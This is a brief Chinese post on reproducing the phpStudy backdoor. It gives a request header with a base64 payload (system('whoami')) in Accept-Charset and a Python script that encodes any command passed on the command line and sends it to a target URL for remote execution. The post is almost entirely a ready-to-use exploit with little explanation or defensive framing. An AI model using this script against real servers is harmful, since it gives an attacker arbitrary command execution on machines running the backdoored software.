phpstudy后门漏洞复现

 

Accept-Encoding: gzip,deflate
Accept-Charset:c3lzdGVtKCd3aG9hbWknKTs=

 

 

 地址

 

脚本如下：

 

import base64,requests,queue,sys
payload = "system('"+sys.argv[2]+"');"
payload = base64.b64encode(payload.encode('utf-8'))
print(payload)
print("---------------------------------")
headers = {'accept-charset': payload,'Accept-Encoding': 'gzip,deflate'}
print(requests.get(sys.argv[1], headers=headers, verify=False,timeout=30,allow_redirects=False).text)
print("---------------------------------")